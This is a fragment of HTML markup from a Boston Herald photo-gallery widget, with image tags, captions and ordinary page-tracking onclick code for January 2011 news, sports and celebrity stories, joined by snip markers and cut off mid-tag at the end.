<img id="198088" src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" title="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." alt="Nancy Lane" style="margin:0 2px" /> </a> ...[SNIP]... leid=1312545" title="Disabled resident tells city: Tap kids to shovel" onclick="switchPhoto('198097'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198097" src="http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg" title="STUCK: Terri Farrell tries to navigate in her scooter along L Street in South Boston. She says she’s been forced to stay home because of all the snow." alt="Angela Rowlings" style="margin:0 2px" /> </a> ...[SNIP]... icleid=1312539" title="Bill Belichick marks Patriots’ milestone" onclick="switchPhoto('198109'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198109" src="http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg" title=" BELICHICK: Proud of what Pats have done under his watch.
" alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... 537" title="Hernia sends hearty partier Charlie Sheen to the hospital" onclick="switchPhoto('198090'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198090" src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" title="Charlie Sheen." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... 516" title="Man in collapse: ‘God was looking out for us’" onclick="switchPhoto('198096'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198096" src="http://multimedia.heraldinteractive.com/images/20110127/stp/ada04c_Collapse_01282011.jpg" title="FALLING DOWN: Rescue workers are at the scene where two drivers were trapped in a roof collapse in Lynn yesterday." alt="Mark Garfinkel" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198205'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198205" src="http://multimedia.heraldinteractive.com/images/20110128/stp/c1e423_ltpSteam012811.jpg" title="BACK UP: Reporter Josh Walovitch gets exfoliated with <i>venik,</i> a bundle of birch and twigs." alt="Patrick Whittemore" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198204'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198204" src="http://multimedia.heraldinteractive.com/images/20110128/stp/2597e5_ltpBikramA012811.jpg" title="GET BENT: Bikram yoga offers 105-degree temps and 90 minutes of hard-core exercise and stretching." alt="" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198105'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198105" src="http://multimedia.heraldinteractive.com/images/20110128/stp/164330_Hot_01282011.jpg" title="FUELING FLAMES: Maura Tucker and Mark Dunn enjoy cocoa and cookies by the fireplace at UpStairs on the Square in Cambridge this week." alt="Ted Fitzgerald" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198197'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198197" src="http://multimedia.heraldinteractive.com/images/20110128/stp/288822_ltpManicure012811.jpg" title="DIGITAL AGE: Your hands will be in tip-top shape after a hot cream manicure at Bliss Spa at the W Hotel." alt="" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198196'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198196" src="http://multimedia.heraldinteractive.com/images/20110128/stp/6819c5_ltpYogaA012811.jpg" title="GET BENT: Bikram yoga offers 105-degree temps and 90 minutes of hard-core exercise and stretching." alt="Herald file" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198210'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198210" src="http://multimedia.heraldinteractive.com/images/20110128/stp/09191d_ltpChromeo012711.jpg" title="Chromeo" alt="" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198208'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198208" src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" title="Bad Rabbits" alt="" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198207'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198207" src="http://multimedia.heraldinteractive.com/images/20110128/stp/afacc0_ltpOMD012711.jpg" title="Orchestral Manoeuvres in the Dark" alt="" style="margin:0 2px" /> </a> ...[SNIP]... iew.bg?articleid=1312514" title="Ways to take the chill out of winter" onclick="switchPhoto('198206'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198206" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8a420e_ltpSteamB012811.jpg" title="Reporter Josh Walovitch, right, chats with Marin McNulty before getting exfoliated." alt="" style="margin:0 2px" /> </a> ...[SNIP]... ?articleid=1312509" title="Cops arrest Shawn Drumgold on drug charges" onclick="switchPhoto('198091'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198091" src="http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg" title="Shawn Drumgold" alt="" style="margin:0 2px" /> </a> ...[SNIP]... sketball/view.bg?articleid=1312503" title="Seminoles wear down Eagles" onclick="switchPhoto('198114'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198114" src="http://multimedia.heraldinteractive.com/images/20110128/stp/550ed9_BC_01282011.jpg" title="CAN’T TAKE IT AWAY: Boston College’s Kristen Doherty (left) and Carolyn Swords surround Florida State’s Chasity Clayton during the Eagles’ 102-93 loss last night." alt="Matt Stone" style="margin:0 2px" /> </a> ...[SNIP]... le="Snow business cancels Julianne Moore’s Hasty Pudding outing" onclick="switchPhoto('198084'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198084" src="http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg" title="Julianne Moore hams it up with Harvard’s Hasty Pudding Theatrical crew in drag as she receives the 2011 Woman of the Year award at Harvard." alt="Nancy Lane" style="margin:0 2px" /> </a> ...[SNIP]... .bg?articleid=1312479" title="Senior Bowl LBs overcame serious scares" onclick="switchPhoto('198082'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198082" src="http://multimedia.heraldinteractive.com/images/20110127/stp/6a0551_ltpherzlich.jpg" title="North squad’s Mark Herzlich of Boston College, talks with scouts following Senior Bowl NCAA college football practice in Mobile, Ala. yesterday. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... articleid=1312394" title="Ravens’ Ed Reed remembers his brother" onclick="switchPhoto('198025'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198025" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e15182_ereed012711.jpg" title="Ravens player Ed Reed speaks at a news conference about the apparent recovery of his brother’s body from the Mississippi River, at the St. Charles Parish Sheriff headquarters in Luling, La., Wednesday." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... articleid=1312387" title="Fast storm collapses roof; city towing cars" onclick="switchPhoto('198067'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198067" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e017a9_ltp012711collapsemg07.jpg" title="Officials stand by during the rescue of two men from a roof collapse in Lynn this morning." alt="Mark Garfinkel" style="margin:0 2px" /> </a> ...[SNIP]... articleid=1312387" title="Fast storm collapses roof; city towing cars" onclick="switchPhoto('198049'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198049" src="http://multimedia.heraldinteractive.com/images/20110127/stp/edc277_ltpLynncar012711.jpg" title="A car where two workers were buried inside of is seen in Lynn this morning. Rescue personnel successfully rescued the occupants, who sustained minor injuries." alt="Mark Garfinkel" style="margin:0 2px" /> </a> ...[SNIP]... cleid=1312351" title="Harrison Barnes lifts North Carolina past Miami" onclick="switchPhoto('197996'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197996" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e8e0fe_hbarnes012711.jpg" title="North Carolina’s Harrison Barnes (40) shoots as Miami’s Reggie Johnson (42) defends in the first half of an NCAA college basketball game in Coral Gables, Fla., Wednesday." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312346" title="Snowstorm wallops Northeast, piling on the misery" onclick="switchPhoto('197992'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197992" src="http://multimedia.heraldinteractive.com/images/20110127/stp/cf9ea2_weather012711.jpg" title="This NOAA satellite image taken Thursday, Jan. 27, 2011 at 12:45 a.m. EST shows comma shaped cloud cover over New England and the western Atlantic Ocean as a strong winter storms brings significant snowfall and strong winds to New England. " alt="Weather Underground/AP" style="margin:0 2px" /> </a> ...[SNIP]... articleid=1312330" title="Turnaround by Tim Thomas a Bruins highlight" onclick="switchPhoto('198039'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198039" src="http://multimedia.heraldinteractive.com/images/20110127/stp/c3e090_ltpThomasgoalie012711.jpg" title="Bruins goalie Tim Thomas makes a stop in the second period." alt="Matt Stone" style="margin:0 2px" /> </a> ...[SNIP]... le="We Hear: Kenny Chesney, Natalie Jacobson, Kate Bosworth & more..." onclick="switchPhoto('198022'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="198022" src="http://multimedia.heraldinteractive.com/images/20110127/stp/df859e_kchesney012711.jpg" title="Kenny Chesney." alt="AP (File)" style="margin:0 2px" /> </a> ...[SNIP]... le="Tracked Down: Shaquille O’Neal, F. Murray Abraham & more..." onclick="switchPhoto('197945'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197945" src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ffe30_Shaq_01272011.jpg" title="Tom O’Brien and Tanner Webb with Shaquille O’Neal." alt="" style="margin:0 2px" /> </a> ...[SNIP]... view.bg?articleid=1312304" title="Enhancing the magic on land and sea" onclick="switchPhoto('197966'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197966" src="http://multimedia.heraldinteractive.com/images/20110127/stp/f64e50_mick_01272011.jpg" title="IT’S A SMALL WORLD: Mickey and Minnie welcome the Disney Dream at Port Canaveral, Fla., earlier this month." alt="" style="margin:0 2px" /> </a> ...[SNIP]... leid=1312240" title="NJ man says he killed UK tourist in self-defense" onclick="switchPhoto('197896'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197896" src="http://multimedia.heraldinteractive.com/images/20110126/stp/e03fb8_davies_01262011.jpg" title="Robert Davies, stands in the Atlantic County Criminal Courthouse in Mays Landing, N.J. Davies admitted Wednesday Jan. 26, 2011 that he killed Lavern Paul Ritch, one of Britain’s most eligible bachelors more than three years ago." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... eid=1312225" title="Tiger Woods looks for fresh start at Torrey Pines" onclick="switchPhoto('197889'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197889" src="http://multimedia.heraldinteractive.com/images/20110126/stp/281a03_tiger.jpg" title="Tiger Woods listens to a question during a news conference at the Farmers Insurance Open golf tournament in San Diego, Wednesday." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... articleid=1312123" title="Memorial at site of Auschwitz oven builders" onclick="switchPhoto('197838'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197838" src="http://multimedia.heraldinteractive.com/images/20110126/stp/23a3a4_ltpHolocaustmemorial012611.jpg" title="A man stands in the exhibition ‘The Engineers of the ’Final Solution’ Topf & Sons - Builders of the Auschwitz Ovens’ after a press conference in Erfurt, central Germany, on Tuesday, Jan. 25, 2011." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... view.bg?articleid=1312089" title="J.D. Salinger secrets remain secret" onclick="switchPhoto('197799'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197799" src="http://multimedia.heraldinteractive.com/images/20110126/stp/283152_jdsalinger012611.jpg" title="In this Jan. 28, 2010 file photo, copies of J.D. Salinger’s classic novel ‘The Catcher in the Rye’ are seen at the Orange Public Library in Orange Village, Ohio." alt="AP (File)" style="margin:0 2px" /> </a> ...[SNIP]... id=1312082" title="Friends: Ore. officer shooting suspect is paranoid" onclick="switchPhoto('197785'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197785" src="http://multimedia.heraldinteractive.com/images/20110126/stp/9c40d7_swat012611.jpg" title="Oregon State Police Swat members climb out of a armored vehicle during a search of a home in the Bayshore community Tuesday in Waldport , Ore. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... e="Tracked Down: Chris Lambton, Robert Plant, Jordan Knight & more..." onclick="switchPhoto('197742'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197742" src="http://multimedia.heraldinteractive.com/images/20110125/stp/e312f8_Lamb_01272011.jpg" title="‘The Bachelorette’ wash-outs Chris Lambton and Kasey Kahl at the Celtics-Cavs game." alt="Matthew West" style="margin:0 2px" /> </a> ...[SNIP]... articleid=1312053" title="FACT CHECK: Obama and his imbalanced ledger" onclick="switchPhoto('197739'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197739" src="http://multimedia.heraldinteractive.com/images/20110125/stp/bf8b87_Bohener_01272011.jpg" title="House Speaker John Boehner watches as President Barack Obama delivers his State of the Union address on Capitol Hill." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... business/general/view.bg?articleid=1312013" title="Heating costs soar" onclick="switchPhoto('197749'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197749" src="http://multimedia.heraldinteractive.com/images/20110126/stp/898a0e_heat_01262011.jpg" title="FILLING UP THE TANKS: Harry Allen, owner of Arlmont Fuel Corp., pulls the hose from his truck while making an oil delivery in Arlington." alt="Stuart Cahill" style="margin:0 2px" /> </a> ...[SNIP]... </b> President Obama’s State of Union address" onclick="switchPhoto('197734'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197734" src="http://multimedia.heraldinteractive.com/images/20110125/stp/351973_SOTU_01262011.jpg" title="President Obama arrives at the podium just prior to delivering his State of the Union address as Vice President Joe Biden and House Speaker John Boehner applaud." alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... ew.bg?articleid=1311916" title="Japan, Australia into Asian Cup final" onclick="switchPhoto('197683'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197683" src="http://multimedia.heraldinteractive.com/images/20110125/stp/7f3550_asia.jpg" title="Australia’s players celebrate at the end of their 2011 Asian Cup semi-final football match against Uzbekistan in the Qatari capital Doha on January 25, 2011. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... ticleid=1311847" title="List of 83rd annual Academy Award nominations" onclick="switchPhoto('197712'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197712" src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" title="Christian Bale and Mark Wahlberg, right, appear in “The Fighter.” The Lowell-based flick was nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. " alt="AP" style="margin:0 2px" /> </a> ...[SNIP]... 806" title="Girl killed in Wash. state shootout may have been runaway" onclick="switchPhoto('197613'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197613" src="http://multimedia.heraldinteractive.com/images/20110125/stp/f1a78a_shooting012511.jpg" title="Sarah Bastura, of Port Orchard, Wash., left, lights a candle for the four people who were shot Sunday in front of a Walmart store in Port Orchard, Monday." alt="Ellen M. Banner/The Seattle Times" style="margin:0 2px" /> </a> ...[SNIP]... ?articleid=1311804" title="A Twitter apology for the former Mrs. Shaq" onclick="switchPhoto('197624'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197624" src="http://multimedia.heraldinteractive.com/images/20110125/stp/b68d99_oneals012511.jpg" title="Va’Shaundya (Shaunie) and Shaquille O’Neal in happier times." alt="AP (File)" style="margin:0 2px" /> </a> ...[SNIP]... 11803" title="We Hear: Jay Leno, Josh Beckett, Zona Jones and more..." onclick="switchPhoto('197606'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197606" src="http://multimedia.heraldinteractive.com/images/20110125/stp/d33d45_jayl_01252011.jpg" title="Jay Leno" alt="Herald file" style="margin:0 2px" /> </a> ...[SNIP]... al/view.bg?articleid=1311802" title="Water pipe break routs residents" onclick="switchPhoto('197594'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197594" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a3a915_evac_01252011.jpg" title="Residents of 660 Washington Street (The Archstone Building) in Downtown Crossing were evacuated due to a water main break in their building." alt="Matthew West" style="margin:0 2px" /> </a> ...[SNIP]... eid=1311794" title="Homeless woman shuns shelter as temps turn deadly" onclick="switchPhoto('197569'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197569" src="http://multimedia.heraldinteractive.com/images/20110124/stp/a26b54_home_01252011.jpg" title="Susan Bakerjones, a homeless woman who refuses to seek a shelter, lives in a tent year round, even when it is bitter cold. " alt="Matt Stone" style="margin:0 2px" /> </a> ...[SNIP]... eid=1311794" title="Homeless woman shuns shelter as temps turn deadly" onclick="switchPhoto('197654'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197654" src="http://multimedia.heraldinteractive.com/images/20110125/stp/0f1e24_ltp012411homelessms01.jpg" title=" Susan Bakerjones, a homeless woman who refuses to seek a shelter, looks out from the tent she calls home during Monday’s bitter cold. " alt="Matt Stone" style="margin:0 2px" /> </a> ...[SNIP]... icleid=1311790" title="At least Tom Brady still wins the hearts of GQ" onclick="switchPhoto('197574'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197574" src="http://multimedia.heraldinteractive.com/images/20110124/stp/147606_brady_01252011.jpg" title="Tom Brady cradles a baby goat in a 2005 GQ spread." alt="GQ" style="margin:0 2px" /> </a> ...[SNIP]... eid=1311785" title="‘Idol’ hopeful’s Pop a Hub fave" onclick="switchPhoto('197572'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197572" src="http://multimedia.heraldinteractive.com/images/20110124/stp/1de6a0_idol_01252011.jpg" title="‘American Idol’ hopeful Ashley Sullivan of Tewksbury poses prior to performing for the judges." alt="Michael Becker/Fox/ Picture Group Photo" style="margin:0 2px" /> </a> ...[SNIP]... television/reviews/view.bg?articleid=1311761" title="Mommie dreariest" onclick="switchPhoto('197591'); pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; "> <img id="197591" src="http://multimedia.heraldinteractive.com/images/20110125/stp